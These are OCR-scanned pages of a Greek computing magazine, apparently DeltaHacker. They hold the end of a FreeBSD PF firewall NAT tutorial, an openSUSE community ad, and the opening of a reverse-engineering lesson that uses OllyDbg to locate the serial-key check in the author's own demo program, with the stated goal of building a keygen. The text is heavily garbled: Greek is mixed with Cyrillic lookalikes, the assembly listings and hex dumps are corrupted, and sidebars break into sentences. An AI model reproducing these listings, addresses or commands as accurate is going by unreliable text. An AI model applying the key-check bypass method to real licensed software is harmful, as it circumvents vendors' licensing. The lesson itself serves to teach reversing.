διευθύνεις της µορφής 192.168.0.* ἡ της µορφἠς 10.0.0.* ἡ κἀποιας ἄλλης 
ano TIG καθιερωμένες για τα τοπικἁ δίκτυα (κλάσης C). Όμως οι διευθύν- 
σεις αυτού του εἶδους δεν ισχύουν στον ἐξω κόσμο, δηλαδή στο Internet! 
Επομένως, ὀταν προσπαθεἰτε να συνδεθείτε σε κἄποιο site (Π.Χ. στο www. 
freebsd.org), av το μηχἀνημὰ σας ἐχει τη διεύθυνση 192.168.0.5, συμβαἱ- 
νουν τα ακὀλουθα: 


Το μηχάνημα δηµιουργεἰ Eva πακέτο µε αποστολέα τη διεύθυνση 
192.168.0.5 (ñ την ὁποια διεύθυνση χρησιμοποιεί, τέλος πάντων) και na- 
ραλήπτη τη διεύθυνση IP του server που φιλοξενεί το www.freebsd.org. 


Καθώς ο παραλήπτης δεν βρίσκεται στο εσωτερικὀ δίκτυο, το πακέτο 
κατευθύνεται στον default gateway. Μ΄ ἆλλα λόγια, κατευθύνεται προς 
το router µας. 


Το router βλέπει το 192.168.0.5 (αποστολέας) και το αντικαθιστἀ αυτόμα- 
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та pE Tn δικἠ του εξωτερικἠ ІР, καθώς аот του αποστολέα δεν παίζει στο 
Internet. Έτσι, το πακέτο φεύγει για το freebsd.org αλλά µε διεύθυνση 
αποστολέα την εξωτερική, δημόσια διεύθυνση του router (εκείνη που 
ἐλαβε ano τον πάροχο Internet). 


Ὅταν ἐλθει η απάντηση ano το freebsd.org, ο παραλήπτης δεν θα εἶναι η 
διεύθυνση 192.168.0.5, αλλά η δημόσια του router! H αγαπημένη µας ou- 
σκευὴ, ὠστόσο, OTAV ¿kave την προηγούμενη αντικατάσταση φρόντισε 
να κρατήσει σημειώσεις! Έτσι, µε την ἀφιξη της απάντησης αλλάζει τη 
διεύθυνση παραλήπτη σε 192.168.0.5 και προωθεί το εισερχόὀμενο пакёто 
στο εσωτερικό δίκτυο. 


H παραπάνω διαδικασία πραγματοποιείται "διαφανώς”, χωρἱς να το KATA- 
λαβαϊνουμε. Н µόνη περίπτωση va то αντιληφθούμε εἶναι αν συνδέσουµε 
πενήντα μηχανήματα πάνω σε Eva φτηνιάρικο router ;-) Τότε, η μνήμη 
του router θα τιγκάρει апо σημειώσεις που θα αφορούν στις μεταφρά- 
σεις/αντιστοιχἰες διευθύνσεων και τα πακέτα θα διακινούνται µε μεγάλες 
καθυστερήσεις -av δεν χάνονται! Αυτὸς εἶναι κι ο λόγος ἄλλωστε για τον 
οποίο στα μεγάλα και κρίσιμα δίκτυα χρησιμοποιούμε πανάκριβο εξοπλι- 
OVO. 


Όλα τα παραπάνω αφορούν το θέµα µας ελάχιστα. Δημιουργούν ωστόσο 
ἑνα εὑλογο ερώτημα: Θα μπορούσε αυτή η διαδικασία (η μετατροπή διευ- 
θύνσεων) να πραγματοποιείται μ’ Eva μηχάνημα που τρέχει FreeBSD; Μα, 
και βέβαια θα μπορούσε! Σ΄ auth την περίπτωση ὁμως το μηχάνημα θα 
χρειαζόταν δύο κάρτες δικτύου (network interfaces). Προφανώς, η pia θα 
μιλάει µε το εσωτερικὀ δίκτυο και ἄλλη HE то εξωτερικὀ. Το ἴδιο συμβαίνει 
και µε TO router σας! H μετάφραση θα πραγματοποιείται καθώς τα πακέτα 
εξἑρχονται (θα αλλάζει η διεύθυνση του αποστολέα), αλλά και καθώς El- 
σἐρχονται (θα αλλάζει η διεύθυνση παραλήπτη). Πριν αναφερθούμε στις 
προσθήκες εντὀς του pf.conf, πρέπει να πούμε бт! το ΝΑΤ πρέπει να ενερ- 
γοποιηθεἰ και στο λειτουργικὀ σύστημα. Па το σκοπὸ αυτὀ θα επἐμβετε 
στο αρχείο /etc/rc.conf, опоо και θα προσθέσετε την ακόλουθη γραμμὴ: 


gateway_enable=”YES” 


Αμέσως μετὰ, για να αποφύγετε την επανεκκίνηση του συστήµατος, OW- 
στε τα ακόλουθα: 


# sysctl net.inet.ip.forwarding=1 
# /etc/rc.d/routing restart 


Ac επιστρέψουµε тора στο pf.conf. Οι ρυθμίσεις για την ενεργοποίηση 
του NAT θα ἦταν φρόνιμο να ξεκινούν µε τα ακόλουθα δύο macros: 


οχι 15210” 

απ 153011” 
Στις παραπάνω δηλώσεις θεωρούμε OT! το εξωτερικὀ interface (αυτό που 
συνδέεται στο Internet) εἶναι το ΓΙΟ, ενώ το εσωτερικὀ (αυτό που OUVOEE- 
ται στο τοπικὀ δίκτυο) εἶναι то rl1. Εννοείται φυσικά бт! τα δύο interfaces 
θα εἶναι σωστά ρυθμισμἑνα апо то /etc/rc.conf! Αυτό όμως εἶναι θέμα για 
алло άρθρο ;-) Στη συνέχεια, για να ενεργοποιηθεἰ το Network Address 
Translation Tou ΡΕ θα πρέπει να προσθέσουμε στο pf.conf την παρακάτω 
γραμμὴ: 

nat pass on $ext_if from $int_if:network to any -> $ext_if 


Στη συνέχεια, арке! να επανεκκινἠστε το routing και το ἰδιο To PF, EKTE- 
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λώντας та εξής: 
/etc/rc.d/routing restart 
/etc/rc.d/pf restart 
Αυτό ñTav! Δεν πιστεύουμε vq ψαρώσατε, £; ;-) 


Αν και η δικἠ µας παρουσίαση του ΡΕ σταματά κάπου εδώ, η δικἠ σας 
μελέτη µπορεί και πρέπει να συνεχιστεί. Θα ἦταν кало λοιπὸν να μελετή- 
σετε τα παρακάτω κείμενα: 


Το OpenBSD PF FAQ. Αυτοί ἑφτιαξαν το ΡΕ. Κάτι θα ξέρουν. Δεν µπορεἰ. 


Άλλο Eva firewall www.openbsd.org/faq/pf 

που βασίζεται στο К Р + 

FreeBSD εἶναι το Το man page για το pf.conf. Αρκεἰ να δώσετε man pf.conf апо To αγαπη- 
monowall. Προτεί- μένο σας τερματικὀ. 

νεται βέβαια μόνο 

για τα απογεύματα Περιορισμένες πληροφορίες για το ΡΕ θα βρείτε και στο FreeBSD 
που θέλετε να Handbook: www.freebsd.org/doc/el/books/handbook/firewalls.html (στο 


τα περάσετε... 
ανάλαφρα. Σ΄ αυτό, 
όλες οι ρυθμίσεις 


HPOYHOTONOICU- Και καθώς σας βλέπουμε να ετοιμάζεστε v’ αντικαταστήσετε ακόµα ¿vav 
ута! µέσω EVOC 


εύχρηστου web Windows server HE TO FreeBSD, δεν μπορούμε пара va τρίβουμε τα χέρια 
interface. нас ano ευχαρίστηση! Happy FreeBSDing! 


ӨШ 
webGuUI Configuration mOnOwall.neon1.net 


WAN 


οποίο θα Bpeite και πληροφορίες για τα ἄλλα δύο firewalls που υπάρχουν 
στο FreeBSD!) 


DMZ 
WLAN 
Firewall 
Rules 
NAT 
Traffic shaper Name mOnOwall.neoni.net 
Aliases T 
Services 220242 i 55: 
DNS forwarder built on Sun Oct 9 18:58:23 CEST 2005 


Dynamic DNS Platform wrap 


DHCP server Uptime 00:34 
DHCP relay 


System information 


Last config change Mon Oct 10 10:59:55 CEST 2005 
CPU usage view graph 
Memory usage =| 36% 


Traffic graph 
Wireless 


> Diagnostics 


тпа! is © 2002-2005 by Manuel Kasper. All rights reserved. [view license] 
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JOIN THE GREEK GEEKO FORCE !!! 


Powered by Lizards, 
Designed for Humans | 


openSUSE 12.1 Arrives ! 


Have a lot of fun ! 


Website: http:/ /www.opensuse.gr / 
Blog: htip:/ /amb.opensuse.gr / 
Mailinglist: opensuse-el@opensuse.org 
IRC channel: #орепѕиѕе-е! 
Twitter: http: / /twitter.com/ openSUSE_Gr 
identi.ca: http: / /identi.ca/ opensusegr 
Facebook: http:/ /on.fb.me/eWFFe5 


Skill: (7 


Advanced 


Tags: Reversing, 


Debugging, Olly, н” t 
Key Generators, = С ay ni )Ver E! = = 
Keygening, = а: 
Assembly — 

Є 


by Thiseas 


Εἶναι καιρὀς πιστεύουμε να μιλήσουμε για την τέχνη 
του πραγματικού reversing. Σκεφτείτε την εξἠς 
διαδικασία: Αρχικά, παΐρνουμε Eva прбүраџџа και 
το αναλύουμε µε κἄποιον debugger. Στη συνέχεια 
το τροποποιούµε προσθέτοντας ἡ αλλάζοντας Eva 
JMP, MOTE να παρακάμπτεται η ὅποια διαδικασία 
προστασίας. Στο τέλος το αποθηκεύουµε ως Eva 
VEO εκτελέσιμο. AUTO το εκτελέσιμο εἶναι το 
λεγόμενο cracked executable, ενώ η διαδικασία nou 
περιγράψαμε ονομάζεται patching και ουδεμία” 
σχέση ἐχει µε TO reversing. AUTO για να µην ἔχουμε 
παρεξηγήσεις ;) 
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Εικόνα 1 

Το πρόγραµµα δεν 
δίνει πολλὲς επι- 
λογές... Καλύτερα! 
Η αναζήτηση στον 
κώδικα µε τον Olly 
debugger θα εἰναι 
απλούστερη ;) 
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Н διαδικασἰα Tou reversing ενὸς προγράµµατος σημαίνει την ανἁλυσή 
του, µε στὀχο την κατανόηση του εσωτερικού αλγορίθμου και γενικότερα 
του τρόπου λειτουργίας του πηγαἰου κὠδικα. Όλα аита βέβαια χωρίς va 
έχουμε στα χέρια µας τον πηγαἰο κὠδικα! Μ΄ ἄλλα λόγια, η διαδικασία του 
reversing εἶναι η αντίστροφη (reverse) ano εκεἰνη που ακολουθούμε отау 
δημιουργούμε Eva πρὀγραµμμα. Φυσικά, πολλὲς φορὲς δεν χρειάζεται va 
κατανοήσουμε ὁλο το πρὀγραμμα αλλά µόνο το τµήµα που µας ενδιαφὲ- 
ρει. Στη δικἠ µας περίπτωση (αυτἠ που θα εξετάσουμε) θ’ ασχοληθούμε 
με TO τµήµα που ελέγχει τη γνησιότητα του κλειδιού που ζητείται апо то 
χρήστη προκειµένου το πρὀγραμμα να ξεκλειδώσει ἡ να ενεργοποιηθεί. 


Σε αυτὀ το άρθρο, λοιπόν, θα εφαρμόσουμε To reversing στο πρόγραµµα 
ελέγχου κλειδιού που φτιάξαμε στο ἀρθρο που αρχίζει апо τη σελίδα 12. 
Σ’ αυτή την προσπάθεια θα λειτουργήσουμε σαν να µην εἴχαμε τον ппүаіо 
κὠδικα пара µόνο το εκτελέσιμο αρχείο (το EXE) και σαν να ἡμασταν 
πολὺ μοχθηροί τύποι (σαν τους µουργόλυκους, Eva πράγμα :D) Τελικά, 
θα παρακάµψουµε την προστασία του προγράμματος κατασκευάζοντας 
ἑνα εργαλείο που παράγει γνήσια κλειδιά. Ναι, кала το καταλάβατε. 2’ 
αυτὀ το άρθρο θα μιλήσουμε για reversing και key-generators (keygen)! 


сепа! Number Verification (2 by Thiseas 2011 for DeltaHacker ИИИ ШЕРА 


Enter Serial Number xaxa 


Wrong Key 


Registration failed. 


Ας αρχῖσει η δράση... 


Έστω бт! ἐχει πέσει στα χέρια µας то εκτελἐσιµο πρὀγραμµα µε TO буора 
KeyProtected1.exe, το οποίο για va τρέξει, απαιτεί να διαθέτεις Eva γνήσιο 
клеі (парте то ZIP pe To EXE ano το http://bit.ly/dhee2keyprotectedexe). 
Θα χρησιμοποιήσουμε (guess who) τον Olly Debugger, ὡστε va τρἐξουµε 
το πρὀγραμμα και µέσω αυτού να βρούμε (να μελετήσουμε) τον αλγόριθ- 
HO ελέγχου του κλειδιού. Έτσι θα μπορέσουμε να κατανοήσουμε και τον 
αλγόριθμο δημιουργίας των κλειδιών, WOTE να τον αναπαράγουμε! 


Πριν ξεκινήσουμε Tov Olly θα πρέπει v’ ακολουθήσουμε τη διαδικασία 
που, κατὰ την άποψη µας, πρέπει ν΄ ακολουθεἰ κάθε reverser: Ανοίγουμε 
το προς μελέτη прбүранна *xwpic* τον Olly κι εξετάζουμε τη λειτουργία 
του. Επίσης, προσπαθούμε να δούμε όλα τα μηνύματα που βγάζει, για 
κάθε πιθανἠ ενέργεια που µας επιτρέπει να κάνουμε. AUTO το βήμα εἰναι 
пара πολὺ σηµαντικὀ, γιατὶ όπως θα δούμε παρακάτω θα µας βοηθήσει 
να βρούμε πιο εὐκολα τον αλγόριθμο που ψάχνουμε: Αυτὸν που ελέγχει 
το κλειδί! AUTO που παρατηρούμε καθώς τρέχουμε το πρὀγραμμα εἰναι 


it!(Olly part 11) 


Re(Cuni)verse 
Ob 8 8 ἳ ἳ ἳ ἳ ἳ ἳΨὔΨ6“Ψὔ“Ἓα κα ἄάἴκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ«-««4 


ότι δεν έχουμε και пара πολλὲς επιλογὲς (βλ. εικόνα 1). Το πρόγραμμα 
нас ζητά Eva κλειδὶ κι εμφανίζει Eva μήνυμα λάθους, στην περίπτωση που 
δώσουμε Eva µη ἐγκυρο. Τίποτα πρωτότυπο μέχρι εδώ. 


Ας ανοίξουμε тора το πρὀγραμμα µε Tov Olly κι ας επαναλάβουµε πάλι 
τη διαδικασία για να πάρουμε το μήνυμα λάθους. Μόλις εμφανιστεί то 
«Registration Failed» επιλέγουμε το ανοιχτό παράθυρο του Olly και патӣ- 
με [F12] (pause), ὥστε να διακόψουμε την εκτέλεση του προγράμματος 
στο συγκεκριµένο σημείο. Απ΄ αυτό το σηµεἰο Ө’ αρχίσουμε να δουλεύου- 
µε µε Tov debbuger. Αμέσως μετὰ το [F12], λοιπὸν, πατάμε [ALT+K] (βλ. 
εικόνα 2). Μ΄ auto βλέπουμε бт! ανοίγει Eva παράθυρο µε τ’ ὀνομα «Call 
stack of main thread». Ας σταθούμε λίγο σ΄ αυτό. Πρέπει να ξέρουμε бт! 
κάθε πρὀγραμμα στα Windows εκτελείται μέσα ос’ Eva thread, που δηµι- 
oupyeital ano το σύστημα. Σκεφτείτε το thread σαν Eva κομμάτι µνή- 
μης που δεσμεύεται апо το λειτουργικὀ κι αποδίδεται στο εκτελούμενο 
πρὀγραμμα. Ταυτόχρονα µε τη δέσμευση της μνήμης ενημερώνεται κι O 
επεξεργαστἠς, ὥστε να εκτελέσει τον κὠδικα του νέου thread. ‘Eva πρὸ- 
γραμμα μπορεὶ να τρέξει σε πολλά threads, ὁπως επἰσης µπορεί να õn- 
μιουργήσει και πρόσθετα (τα λεγόμενα child-threads). To αρχικό thread 
ονομάζεται main thread. Όλα кала μέχρι εδώ, θα µας πείτε, ὀμως AUTÒ 


[5] CPU - main thread, module USER32 


[K] Call stack of main thread 


Stack Procedure 
7637CD46| USERS2. WaitNessage 
37CC3D 


Rddress Called from 


0018F100 


USER32.7637CD41 
SE! . F! 


ас JMP. иѕег32. MessageBou lil> 
9 2 K 98 


93 
R32. Sof tModa ІМеззазеВон 4. 


USEI 
QG18F 374) 763AFB1F| USERS2. 76SAF PAF USERS2. 763AFB1A 
0018F3E0| 763AFD15| USER32.MessageBoxT imeoutll USER32. 763AFD18 
@@18Е4@@ Gee alae ae USERS2. NessageBoxEx Wl 


πο ο tenes 


4 
@ eyProte 

KeyProte. 0048; 2788 503: 
0018F4EC| Б035701В | vel 160. Gc | Соптго і =@ТСопегоі@С l іскзаагу ос 1166. 56357016 
QB19F4F4| SaaS 7Ba9| < ЈМР. &rt L160. ο αἱ ποσα ue 1160.50357B04 
QG18F4FC| 50332823) Includes ucl1l68.5035 vo l168.56332828 
0018F62C 56337178) wcl 168. dus lecon tro lceTControlēlindProcšaarr2állinapi@Mess ve l166.5633716B 
00138F678 ΞΒΞΞΕΓΕΞ vol1é0.6Ue [@ControlseTWinContro|@UindProcsqqrr24il inapiétld ve L160. ΞΘΞΕΕΟΕΘ 
0018F688| 50332447 | Includes vol16G.5@356CES vo l160. 50332444 


το call stack τι εἶναι; Κάθε εντολἠ που εκτελεἰ το проүрарра καταχωρεἰ- 
ται ano τον debugger σε ша Ліста ἡ καλύτερα σε µια στοἰβα (stack). To 
παράθυρο λοιπὀν μὰς εμφανίζει τις TEAEUTAIEG EVTOAEG που κλήθηκαν για 
να εκτελεστούν (call stack). 


Στην εικὀνα 2 φαίνεται ὁτι αµέσως πριν τη διακοπὴ το πρὀγραμμα εἰχε 
µεταβεἰ στη διεύθυνση του USer32.messageBoxW. Πρόκειται για τη δι- 
αδικασίἰα που εμφανίζει το παράθυρο µε το μήνυμα αποτυχίας! Ειρω- 
vegia, =; Το παράθυρο αποτυχίας θα εἶναι αυτό που θα µας οδηγήσει στην 
επιτυχία! Μην πεἰτε, отёкє GKOUN KI ως Φιλοσοφική ρήση ;) Edo Өё- 
λουµε να προσέξετε λίγο τις στήλες που εμφανίζονται. Στη συγκεκρι- 
μένη περίσταση θα µας απασχολήσουν οἱ Procedure και Called from. H 
πρώτη δείχνει το ὀνομα της συνάρτησης που καλεῖται και η 2η δείχνει 
ano ποια διαδικασία καλεῖται. Ας επικεντρωθούμε λίγο στις διαδικασἰ- 
ες. Βλέπουμε διάφορες, ὁπως την νεἰ160, τη иѕег32 και την keyprote. 
AuTñ που µας ενδιαφἑρει тора εἶναι η keyprote, αφού οι ἄλλες δύο ano- 
τελούν standard βιβλιοθήκες του λειτουργικού συστήματος και της συ- 


Εικόνα 2 
Σταματήσαμε 

το πρὀγραμμα 

τη στιγµή που 
εμφανίστηκε το 
μήνυμα λάθους. 
Ας δούμε ποιος 
κάλεσε τη διαδικα- 
σία εμφάνισης του 
μηνύματος. Ίσως 
αυτός ο «κάποιος» 
να πραγµατοποίη- 
σε και τον έλεγχο 
γνησιότητας του 
κλειδιού! 
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ποπ EDX, DUORD PTR DS: LEART ш ЖЕРШЕ 


ETE 
RD PTR DS: Γ486Ε841, EDX 
PTR DS:[<&CC321208HT.__uargu>1 CC32126N.__wargy 
сз 
97150009 
3 
Backup 
Copy А 
Віпагу А 
Assemble Space 
Label - 
š Comment Н 
К Breakpoint » 
Ы Hit trace » 
Е Run trace , 
> 
00403F37||. Follow Enter 
00405114=< = = 
ἔπει calls G Р Minus 
Thread А Expression Ctrl+G 
6 Follow in Dum Е F 
8 Ρ Previous procedure Ctrl+ Minus 
a View call tree Ctrl+K 
A Net procedure Ctrl+Plus 
А Search for А 
Е CALL from 0040282F 
а Find references to › 
88486098 : CALL from 00402854 
eee 1 View 
D04960F0 Β CALL from 00402424 
0040600 a - 
СЕ 8 | een T: Set ETES 
ΒΘ4ΡΕεΒΕΒ a z 2 
00406100 a Analysis » ΒΡ1ΙΒΕΔΕΒΙ{ 823C6F50 
00406119 a š @G1SF4EC|| 50357016 
ададе 12а Я pees BG1SF4Fa|| ƏB12F6390 
00406139 g Bookmark > foe. кеа || Esas a: 
5486140 Β =a 
0040606150 9 БЕСЕ ØØ1SF4FC|| 50322523 
он | Appearance » е 
00496170 5 tion 
andai iom eel 38 я 6018F508|| Ρ2ΞΓΕΕΞΗ 


Εικόνα 3 

Με δεξί κλικ κι 

απὀ το μενού 

που εµφανίζεται, 
μπορούμε να δούμε 
τις περιοχές του 
προγράμματος που 
καλούν τη διαδι- 
κασία εμφάνισης 
του μηνύματος. Σε 
κάποια an’ αυτὲς 
ελέγχεται το κλειδί 
και πρέπει να την 
εντοπίσουµε εξε- 
τἀζοντάς τες όλες, 
ξεχωριστά. 
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γκεκριµένης υλοποίησης του παραθυρικού περιβάλλοντος (VCL, Visual 
Component Library). KataAaBaivouye εὐκολα бт! η keyprote αφορά στο 
πρὀγραμμἁ µας (KeyProtected1.exe). Αν κάνουμε double-click πάνω στην 
EVTOAN που ξεκινά µε το keyprote, o Olly θα µας τοποθετήσει αµέσως 
μέσα ото main thread του προγράμματος και συγκεκριµένα στην EVTOAN 
που κλήθηκε για να µας δείξει το παράθυρο µε το μήνυμα αποτυχίας. 
Αφού βρεθούμε µέσα στο main thread, μπορούμε πλέον v’ αρχίσουμε την 
αναζήτηση. Πα την wpa, αυτό που µας ενδιαφἑρει εἶναι να εντοπίσουμε 
τη διαδικασία που κάλεσε την εντολἠ εμφάνισης του μηνύματος αποτυ- 
Χίας. Mac παρακολουθείτε ακόµα, έτσι; Па να βρούμε αυτή τη διαδικα- 
σία, κάνουμε δεξὶ κλικ κι απὀ στο μενού ακολουθούμε τη διαδρομή «Go 
to --> CALL From τάδε διεύθυνση» (βλ. εικόνα 3). Προφανώς, εφόσον 
ψάχνουμε, θα πρέπει να δοκιµάσουμµε ὀλες τις διευθύνσεις ano τι οποίες 
γίνονται κλήσεις προς τη θέση που βρισκόμαστε. Βλέπετε, σε μία апо τις 
περιοχές του προγράμματος που ζητούν την εμφάνιση του μηνύματος 
αποτυχίας, βρίσκεται κι ο κὠδικας που κάνει τον ἐλεγχο γνησιότητας του 
κλειδιού. AUTH η περιοχἠ, λοιπὀν, εἶναι και η ζητούμενη για του περισσὀ- 
τερους reverser... 


Re(uni)verse it!(Qlly part 11) 
⁄////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 


r 
E CPU - main thread, module KeyProte 


ТОЗПЕТБНИГ. ЕВ Eres [CALL «ει vol 1é0. @Ucl@controls@Tcontra Е: 
ΒΒάΒΖΤΒΕΙ] ` 8055 FC LEA EDX, DWORD PTR SS: ΓΕΒΡ-41 
04027С2|| ` FF32 PUSH DWORD PTR OS: CED (8:21 

` ES 73FDFFFF |CALL KeyProte. 08402530 πο paqpas: 
бйайстсЭ |+ 59 POP ECX 

: 50 PUSH EAX Argl 

1 FF4D ΕΘ DEC DWORD PTR 58: ГЕВР-191 

1 8045 ЕС ГЕЯ EAX, DWORD PTR SS: ΓΕΒΡ-41 

1 BA G2egee09 |00 EDX, 

1 ЕВ 40299008 |CALL KeyProte. 90404828 KeyProte. 00424828 

1 59 POP ἘΌΝ 

+ 8509 TEST ECH, ECX 

1974 ЈЕ SHORT KeyProte. 00402841 


+ 66: C745 E4 та Моо WORD PTR SS:TEBP [23418 
LEA EAX, DWORD PTR SS: LEBP-81 — 

ES tapaooeo | CALL KeuProte. 00402868 (a 

SBDA MOU EDX, EAX 

ΕΕ4Ξ ΕΘ INC WORD PTR вз: ГЕВР-101 


Mi ' 
Seat Βθοοοροῦ MOV EAX, DWORD PTR DS: CECK+3981 
ES apeg 2689 | CALL «ΠΡ. &0с1160. @Vcl@Controls@TContra 
8055 ΕΒ LEI Ü LEBP-81 


- Н EDX, DWORD PTR $s 

. РЕЗ2 PUSH DWORD PTI 

» ЕЗ ASFBFFFF | CALL KeyProte. 00402580 

а 59 POP ECX 

+ FF4D FØ DEC DWORD PTR 55:ΓΕΒΡ-181 

. 8045 F8 LEA EAX, ΠΗΡΕ PTR 55: CEBP-81 

. BA 92999080 | MOV EDX, 

. ES δ 99008 EREL КЕ RebProve. 00404828 

- B9 ΕΒΕΙ4ΡΡΑ | MOU ЕС, KeyProte. 004061E0 UNICODE "Sucessfull registrat iont" 7 

н ВА 86614000 | MOU EDK, КеуРготе. 00406186 UNICODE "Thank you for registering for this softwaret™ 


. ΒΒΘΒ 
. ει ee cle CALL KeyProte. 4946: Баа 
- DX, DWORD 
ΕΞ be RI 
. ЕВ BD010008 | CALL KeuProte.,B040829FC 
B 18 ЧИР SHORT KeyProte. 00402859 
ү ЕВ 18 р 10 


MOU ECK, KeyProte. 0040623С UNICODE "Wrong Key" 
> ВА see MOU EDX, KeyProte. 46466212 UNICODE "Registration failed.” 


μαι DWORI 
ES AF160000 |CALL KeyProte.00403F08 
8B! DX, DWORD 


MOU El PTR SS: CEBP-2C1 
: 64:8915 йй@ййї MOY DWORD PTR FS: [8], EDX - 
SPEC MAI ESP ЕВР 
Εμεὶς πήραμε µε τη σειρἀ ὀλες τις διευθύνσεις. Μ΄ ἄλλα λόγια, δοκιμάσα- _ Εικόνα 4 
µε κάθε «CALL from τάδε διεύθυνση» που βρήκαμε. Σε κάθε περιοχἠ που Axa! Εδώ γίνε- 


Tal ἑνας βασικὀς 
έλεγχος για TO 
μήκος του κλειδιού 


μας οδηγούσαν τα «Call from...», βάζαμε Eva break point πατώντας [F2] 
και αρχἰζαμε να διαβάζουμε τον κὠδικα Assembly για να διαπιστώσουμε 


αν πραγματοποιούσε τον ἐλεγχο του κλειδιού. Περιττό να πούμε бт! σε που δώσαμε. Κατά 
αυτό το στάδιο χρειάζονται κάποιες γνώσεις Assembly ἠ/και εμπειρία στο паса πιθανότητα, 
reversing, MOTE να καταλαβαίνετε NOTE µια σειρἀ εντολών σας ενδιαφὲ- κάπου εδώ θα 
ρει ἡ πραγματοποιεἰ апла κάποιες κλήσεις προς στο λειτουργικὀ σύστη- ο... 
μα, ἁσχετες u’ αυτό που ψάχνετε. Αφού τελείωνε ο ἐλεγχος του κὠδικα коо ea 


-KI εφόσον δεν εἰχαμε βρει την περιοχἠ που µας ενδιέφερε-, πατούσαμε 
[B] για να εμφανιστεί ο πίνακας µε Ta breakpoint. An’ αυτόν επιλέγαµε 
το breakpoint που εἰχαμε δημιουργήσει Ліүо πριν κι ETO! επιστρέφαμε 
στο σημείο απ΄ ὀπου εἶχε ξεκινήσει η µελέτη του κὠδικα. Εκεί, βέβαια, 
βρισκόταν η κλήση προς τη διαδικασία που τύπωνε το μήνυμα, µε ἄλλα 
λόγια προς τη διαδικασἰα απὀ την οποία εἶχαμε ξεκινήσει την αναζήτηση. 
Ἔτσι, πατούσαμε [Enter] για να μεταφερθούμε εκεἰ και στη συνέχεια επι- 
λέγαμε το επόμενο «Call from...». Επαναλαμβάνοντας αυτή τη διαδικασία 
καταλήξαμε στη διεύθυνση 0049027C4 (βλ. εικὀνα 4). Σ΄’ айтп} την περιοχή 
βρήκαμε µια κλήση προς µια ύποπτη διαδικασία. Έτσι, πατήσαμε [Enter] 
κι οδηγηθήκαµε σε µια νέα διεύθυνση (08402536). Απ’ αυτήν ξεκινούσε 
µια μεμονωμένη συνάρτηση, την οποία ο debbuger εἶχε σημειώσει µε µια 
µεγάλη αγκύλη (βλ. εικόνα 5). 


Ο στὀχος εντοπίστηκε... 


O κὠδικας στη θέση ὁπου βρισκόμαστε φαίνεται περἰπλοκος αλλά δεν θα 
εἶναι για πολὺ, εφόσον τον αναλύσουμε γραμμὴ προς γραμμή. Αυτό nou 
θα κάνουμε σαν прото βήμα εἶναι να τοποθετήσουμε Eva break point 
στην αρχὴ της συνάρτησης και να ελέγξουμε τη συμπεριφορὰ της, δίνο- 
ντας διαφορετικἀ, τυχαία κλειδιά. Το κάναμε και παρατηρήσαμε To εξής: 
Έχοντας δώσει σαν κλειδὶ το «88888», η συνάρτηση τερματιζόταν πάντα 
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55 PUSH ЕВР 
66442530|}. ΘΕΕΟ HOU EBF, ESP 
GE4E253F/]. 5554 BC ADD ESP, —44 
53 PUSH EBA 
. BS БС634000й | MOV EAK,KeyProte. 00460635C 
. ES 3B120000 {CALL keuProte. 90403758 
. C745 FS G168G) MOU DWORD PTR 55: ГЕВР-22, 1 
. 8055 DS LEA ED, DWORD PTR 55: [EBP+2] 
8045 85 LEA EAX,DWORD PTR Hee ae 
. ES 65220066 [ΓΗ͂ БЕ KeyProte. ΒΒ4ΡΑΤ 
. FFAS FS INC DWORD PTR SS: teers 3] 
oo EC ØC! WORD PTR 55: ГЕВР-141, 0С 


. ЕП 
. 8955 08 DWORD PTR 55: СЕВР- 281, EDX 
. 8045 88 2327 ee RIR 55: ГЕВР+81 


PUSH EAN 
DEC DWORD PTR 55: (CEBP-3 
80 LEA EAX, DWORD PTR 55: [EBP+81 
. BA Β2ΒΒΒΒΒῚ |HDU EDX,2 
. ΕΒ 96220000 CALL KeuProte. 90404828 


. 8855 DC EDX, DWORD PTR SS: CEBP-24] 
64:8915 00000 DWORD PTR FS: [0], ED% 
᾿«Ε9 ΒΕΘΒΒΡΡΒ KeyProte. 88402668 
3553 ECK 


ECH, EC. 

DWORD PTR 55: CEBP-2C1,ECK 

ΕΒΧ, DWORD PTR SS: CEBP-2C] 

EAX,OWORD PTR 55: CEBP-38] 
E SHORT KeyProte,. 684625CF 


G 
Mou EDs, DWORD PTR 55: CEBP-2C1 


65 r2 БЕ 20 Embarcadero RAD 
28 45 БЕ ΤΘ Studio - Copyrig 
45 60 62 61 ht 2009 Embarcad 
65 τῷ ΕΕ 28 6E ΕΕ 6с БЕ ero Technologies 
2C 28 49 6 q INC. s.a К. 10, 
Ε 4 4 lm. рға. 8... 
5. Ε55, [58 
4he. £18. 318 mod. 
re. 25@.7°S@.7hG. 
+ AiG. сів... 


F па ва ва 

а ва йй ва 
ΕΠ па йй йй Bü йй йй ва 
ай йй йй йй ай йй йй йй 
ай ай вв BB ай йй йй вв 


2.37 48 00 FC ΕΕ 48 DD pQ ΕΕ 48 Ва Зс 
ØC Bü 51 58 ай йй 40 BA 
66 88 48 вв 66 йй 66 88 
65 61 73 4B 6F 74 65 63 
йй 88 48 65 68 88 61 00 
26 66 гэ 88 20 йй 66 00 
26 йй 72 йй 69 йй 73 ΠΒ 
т2 98 69 ΒΒ 20 йй 66 йй 
26 ай 74 00 75 ΒΒ 26 00 
66466108 66 ва 74 88 72 ΒΒ 65 йй 


στη διεύθυνση 09040257C. Κάτι συνέβαινε εκεὶ (βλ. εικόνα 5). O κώδικας 
που κἀνει τη συνάρτηση να τερματίζει φαίνεται παρακάτω: 


00402578 CMP DWORD PTR SS:[EBP-30],13 
0040257C JE SHORT KeyProte.004025A2 


=’ аотб το σηµείο θα δούμε Eva γρήγορο τρόπο να καταλάβουμε TI ἐχει 
συμβεί, χωρίς να εἴμαστε αναγκασμένοι να διαβάσουμε ὁλον τον npon- 
γούμενο κὠδικα, που οδήγησε στον τερματισμὀ. Βλέπουμε бт! στη διεύ- 
θυνση 90402578 γίνεται µια σύγκριση: Συγκρίνονται τα περιεχόμενα της 
διεύθυνσης (Extended Base Pointer - 30) µε τον δεκαεξαδικὀ αριθμό 13 
(δηλαδἠ τον δεκαδικὀ 19 - σας θυμίζει τίποτα;) Πάμε ὀμως να βρούμε nou 
κρύβεται ο «Extended Base Pointer - 30». Κάνουμε right-click στο като 
δεξιά κομμάτι του Olly (όπως φαίνεται στην εικόνα 5) κι επιλέγουμε Goto 


ΒΠΡΘΡΘΒΞ, 
« ΠΒΙΞΕ4Π8 
x ΒΒΡΒΡΡΒΒ 
Β2ΞΓ6ΕΞΩ 
ай18Е458 
GG1SF4Aa 
